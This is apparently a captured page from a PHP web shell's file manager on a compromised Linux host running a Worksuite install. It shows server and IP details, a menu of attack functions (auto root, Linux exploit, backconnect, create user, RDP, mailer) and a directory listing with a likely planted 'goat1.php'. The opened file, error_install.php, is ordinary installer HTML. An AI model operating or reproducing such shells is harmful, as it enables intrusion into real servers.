Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
backup-and-restore
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flags
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
installer
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sample-import
[ DIR ]
drwxr-xr-x
sounds
[ DIR ]
drwxr-xr-x
user-uploads
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
.htaccess
199
B
-rw-r--r--
OneSignalSDKUpdaterWorker.js
71
B
-rw-r--r--
OneSignalSDKWorker.js
71
B
-rw-r--r--
check.php
23.95
KB
-rw-r--r--
country.json
50.54
KB
-rw-r--r--
error_install.php
5.43
KB
-rw-r--r--
favicon.ico
15.04
KB
-rw-r--r--
favicon.png
1
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.95
KB
-rw-r--r--
install-version.txt
8
B
-rw-r--r--
license-waoi.php
629
B
-rw-r--r--
manifest.json
99
B
-rw-r--r--
message-notification.mp3
34.22
KB
-rw-r--r--
percent-module-download.txt
1
B
-rw-r--r--
robots.txt
85
B
-rw-r--r--
service-worker.js
63
B
-rw-r--r--
version.txt
7
B
-rw-r--r--
w
0
B
-rw-r--r--
web.config
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error_install.php
<!DOCTYPE html> <html> <head> <title>Worksuite Not Installed</title> <script src="https://cdn.tailwindcss.com"></script> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet"> </head> <body class="bg-gray-50 font-['Inter']"> <div class="min-h-screen flex items-center justify-center p-4"> <div class="max-w-2xl w-full"> <div class="text-center mb-8"> <h1 class="text-3xl font-bold text-gray-900 mb-2">Installation Error Detected</h1> <p class="text-gray-600">Please address the following issues to complete your installation</p> </div> <?php if ($GLOBALS['error_type'] == 'php-version') { ?> <div class="bg-red-50 border-l-4 border-red-500 p-6 rounded-lg shadow-sm mb-6"> <div class="flex items-start"> <div class="flex-shrink-0"> <svg class="h-6 w-6 text-red-500" fill="none" viewBox="0 0 24 24" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" /> </svg> </div> <div class="ml-4"> <h3 class="text-lg font-semibold text-red-800 mb-2">PHP Version Requirement Not Met</h3> <p class="text-red-700 mb-4">Your server's PHP version is lower than the required version <span class="font-semibold">8.3.0</span>. Please upgrade to continue with the installation.</p> <div class="bg-white bg-opacity-50 rounded p-4 border border-red-200"> <p class="text-red-600">Current PHP Version: <span class="font-semibold"><?php echo phpversion(); ?></span></p> <p class="text-sm text-red-500 mt-2">Required Version: ≥ 8.3.0</p> </div> <div class="mt-4"> <h4 class="font-medium text-red-800 mb-2">Next Steps:</h4> <ul class="list-disc list-inside text-red-700 space-y-1"> <li>Contact your hosting provider to upgrade PHP</li> <li>Ensure your server meets all system requirements</li> <li>Restart the installation process after upgrading</li> </ul> </div> </div> </div> </div> <?php } else { ?> <div class="bg-red-50 border-l-4 border-red-500 p-6 rounded-lg shadow-sm"> <div class="flex items-start"> <div class="flex-shrink-0"> <svg class="h-6 w-6 text-red-500" fill="none" viewBox="0 0 24 24" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" /> </svg> </div> <div class="ml-4"> <h3 class="text-lg font-semibold text-red-800 mb-2">Missing Environment File</h3> <p class="text-red-700 mb-4">The <span class="font-mono bg-red-100 px-1 rounded">.env</span> file is missing from your installation.</p> <div class="bg-white bg-opacity-50 rounded p-4 border border-red-200"> <h4 class="font-medium text-red-800 mb-2">How to fix this:</h4> <ol class="list-decimal list-inside text-red-700 space-y-1"> <li>Locate the <span class="font-mono">.env.example</span> file in your project</li> <li>Make a copy and rename it to <span class="font-mono">.env</span></li> <li>Update the configuration values as needed</li> </ol> </div> <div class="mt-4"> <a href="https://froiden.freshdesk.com/support/solutions/articles/43000491463" target="_blank" class="inline-flex items-center text-red-700 hover:text-red-800 font-medium"> <span>View detailed instructions</span> <svg class="ml-1 w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" /> </svg> </a> </div> </div> </div> </div> <?php } ?> <div class="text-center mt-8"> <p class="text-gray-600">Need help? Contact our support team for assistance.</p> </div> </div> </div> </body> </html>
Close